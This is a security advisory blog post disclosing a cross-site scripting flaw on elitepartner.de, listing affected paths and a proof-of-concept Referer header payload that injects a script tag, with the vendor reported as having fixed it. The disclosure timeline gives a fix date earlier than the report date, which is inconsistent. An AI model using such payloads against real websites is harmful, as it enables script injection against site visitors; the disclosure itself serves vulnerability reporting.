Jan 10: SSCHADV2012-024 - elitepartner.de Cross-site Scripting vulnerability

Advisory:
www.elitepartner.de – Cross-site Scripting vulnerability
Advisory ID:
SSCHADV2012-024
Author:
Stefan Schurtz
Affected Software:
Successfully tested on www.elitepartner.de
Vendor URL:
Vendor Status:
fixed
 
======================
Vulnerability Description
======================
 
http://www.elitepartner.de is prone to a XSS vulnerability
 
======================
PoC-Exploit
======================

http://www.elitepartner.de/km/gfx/starthomepage/
http://www.elitepartner.de/km/static/js/jquery/
http://www.elitepartner.de/km/gfx/
http://www.elitepartner.de/km/static/
http://www.elitepartner.de/km/js/
http://www.elitepartner.de/km/static/js/omniture/
http://www.elitepartner.de/km/static/js/

Referer: ‘"></style></script><script>alert(/huh/)</script>

======================
Solution
======================

fixed

======================
Disclosure Timeline
======================

23-Dec-2012 – informed by contact form
10-Jan-2012 – fixed by developer

======================
Credits
======================

Vulnerability found and advisory written by Stefan Schurtz.

======================
References
======================

http://www.darksecurity.de/advisories/2012/SSCHADV2012-024.txt
Geschrieben von Stefan Schurtz in Security Advisories Kommentare: (0) Trackbacks: (0)
Tags für diesen Artikel: , , , ,
Zuletzt bearbeitet am 10.01.2013 18:45

Trackbacks
Trackback-URL für diesen Eintrag

Keine Trackbacks

Kommentare
Ansicht der Kommentare: (Linear | Verschachtelt)

Noch keine Kommentare


Kommentar schreiben


Um maschinelle und automatische Übertragung von Spamkommentaren zu verhindern, bitte die Zeichenfolge im dargestellten Bild in der Eingabemaske eintragen. Nur wenn die Zeichenfolge richtig eingegeben wurde, kann der Kommentar angenommen werden. Bitte beachten Sie, dass Ihr Browser Cookies unterstützen muss, um dieses Verfahren anzuwenden.
CAPTCHA 1CAPTCHA 2CAPTCHA 3CAPTCHA 4CAPTCHA 5


Textile-Formatierung erlaubt
Sie können [geshi lang=LANG][/lang] Tags verwenden um Quellcode abhängig von der gewählten Programmiersprache einzubinden